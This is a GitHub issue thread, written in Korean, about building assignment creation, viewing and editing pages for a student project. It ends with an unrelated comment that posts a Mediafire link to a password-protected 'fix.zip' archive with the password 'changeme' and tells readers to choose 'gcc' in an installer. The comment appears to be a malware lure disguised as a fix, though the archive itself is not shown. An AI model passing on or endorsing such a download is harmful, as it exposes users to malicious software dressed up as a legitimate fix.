### ISSUE TITLE
[Feature] 과제 개설, 과제 내용 보기, 과제 수정 페이지 구현

### ISSUE THREAD

**Issue by hamo-o** [GDSC-Hongik/wow-class#75]
## 🎯 설명
<img width="1486" alt="image" src="https://github.com/user-attachments/assets/2c47ae5a-773d-4405-8228-8a475ed11d0d">

## ✅ TODO
- [x] 과제 개설, 조회, 수정 UI
- [x] 과제 개설, 조회, 수정 API 연결

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
